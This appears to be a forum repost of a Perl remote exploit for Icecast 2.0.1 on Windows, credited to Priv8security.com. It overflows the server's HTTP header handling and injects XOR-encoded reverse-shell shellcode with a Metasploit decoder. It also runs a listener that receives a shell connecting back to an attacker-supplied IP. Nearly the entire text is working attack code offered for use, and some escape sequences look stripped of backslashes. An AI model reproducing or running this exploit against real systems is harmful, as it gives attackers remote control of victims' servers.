文章作者:Bug found by Luigi Auriemma
复制内容到剪贴板
代码:
#!/usr/bin/perl
################################################
# Priv8security.com remote Icecast 2.0.1 for windows exploit.
#
# Bug found by Luigi Auriemma
# Url: [url]http://aluigi.altervista.org/adv/iceexec-adv.txt[/url]
#
# This exploit give you a nice reverse shell on a host running
# Icecast 2.0.1 on windows.
# Older versions not tested.
use IO::Socket;
use Getopt::Std; getopts('h:i:l:p:', %args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'i'})) { $yourip = $args{'i'}; }
if (defined($args{'l'})) { $yourport = $args{'l'}; }else{$yourport = 6969;}
if (defined($args{'p'})) { $port = $args{'p'}; }else{$port = 8000;}
print STDERR "-=[Priv8security.com Icecast 2.0.1 remote exploit]=-nn";
if (!defined($host) || !defined($yourip)) {
print STDERR "Options:
-h Victim ip.
-i Ip to connect back.
-l Port to connect back.
-p Port to attack.nn";
print STDERR "Usage: perl $0 -h Victim -i YOURIPnn";
exit;
}
$off_port = 161;
$port_bin = reverse(pack("S", $yourport));
$off_host = 154;
$host_bin = gethostbyname($yourip);
$shellcoder = # win32 reverse by hdm[at]metasploit.com
"xe8x30x00x00x00x43x4dx44x00xe7x79xc6x79xecxf9xaa".
"x60xd9x09xf5xadxcbxedxfcx3bx8ex4ex0execx7exd8xe2".
"x73xadxd9x05xcex72xfexb3x16x57x53x32x5fx33x32x2e".
"x44x4cx4cx00x01x5bx54x89xe5x89x5dx00x6ax30x59x64".
"x8bx01x8bx40x0cx8bx70x1cxadx8bx58x08xebx0cx8dx57".
"x24x51x52xffxd0x89xc3x59xebx10x6ax08x5ex01xeex6a".
"x08x59x8bx7dx00x80xf9x04x74xe4x51x53xffx34x8fxe8".
"x83x00x00x00x59x89x04x8exe2xebx31xffx66x81xecx90".
"x01x54x68x01x01x00x00xffx55x18x57x57x57x57x47x57".
"x47x57xffx55x14x89xc3x31xffx68xc0xa8x00xf7x68x02".
"x00x22x11x89xe1x6ax10x51x53xffx55x10x85xc0x75x44".
"x8dx3cx24x31xc0x6ax15x59xf3xabxc6x44x24x10x44xfe".
"x44x24x3dx89x5cx24x48x89x5cx24x4cx89x5cx24x50x8d".
"x44x24x10x54x50x51x51x51x41x51x49x51x51xffx75x00".
"x51xffx55x28x89xe1x68xffxffxffxffxffx31xffx55x24".
"x57xffx55x0cxffx55x20x53x55x56x57x8bx6cx24x18x8b".
"x45x3cx8bx54x05x78x01xeax8bx4ax18x8bx5ax20x01xeb".
"xe3x32x49x8bx34x8bx01xeex31xffxfcx31xc0xacx38xe0".
"x74x07xc1xcfx0dx01xc7xebxf2x3bx7cx24x14x75xe1x8b".
"x5ax24x01xebx66x8bx0cx4bx8bx5ax1cx01xebx8bx04x8b".
"x01xe8xebx02x31xc0x89xeax5fx5ex5dx5bxc2x08x00";
substr($shellcoder, $off_port, 2, $port_bin);
substr($shellcoder, $off_host, 4, $host_bin);
$xor = 0x99;
foreach my $char (split(//, $shellcoder)) #xor the shellcode to avoid nulls
{
$res .= chr(ord($char) ^ $xor);
}
$scxored = $res;
$len = pack("S", 0xffff - length($scxored));
$decoder = #decoder from Metasploit.com by hdm[at]metasploit.com
"xd9xe1". # fabs
"xd9x34x24". # fnstenv (%esp,1)
"x5b". # pop %ebx
"x5b". # pop %ebx
"x5b". # pop %ebx
"x5b". # pop %ebx
"x80xebxe7". # sub $0xe7,%bl
#
# short_xor_beg:
#
"x31xc9". # xor %ecx,%ecx
"x66x81xe9$len". # sub $len,%cx
#
# short_xor_xor:
#
"x80x33x99". # xorb $0x99,(%ebx)
"x43". # inc %ebx
"xe2xfa";
$buffer = "xebx04" . "AA: " . "x90" x 10 . $decoder . $scxored . "rn";
$crap = "AAAA: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArn";
$pacote = "GET / HTTP/1.0rnHost: Priv8security.comrn";
$pacote .= $crap x 30 . $buffer . "rn";
$b = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port)
or die "Cant connect: $!n";
Listenshell($yourport);
print STDERR "[+] Sending our stuff... ";
$b->send($pacote);
print STDERR "DOne!n";
print STDERR "[+] Now wait for connectback shell...n";
sub Listenshell {
my ($lport) = @_;
my $lsock = IO::Socket::INET->new(Proto=>"tcp",LocalPort=>$lport,Type=>SOCK_STREAM,Listen=>3,ReuseAddr=>1)
or die "[-] Error starting listener: $!n";
print "[+] Listener started on port $lportn";
die "cant fork: $!" unless defined($listen_pid = fork());
if ($listen_pid) {
my $cback;
while ($cback = $lsock->accept()){
print STDOUT "[+] Starting Shell " . $cback->peerhost . ":" . $cback->peerport . "nn";
print $cback "n";
die "cant fork: $!" unless defined($pid = fork());
if ($pid) {
while(defined ($line = <$cback>)) {
print STDOUT $line;
}
kill("TERM", $pid);
}
else
{
while(defined ($line = <STDIN>)) {
print $cback $line;
}
}
}
}
}
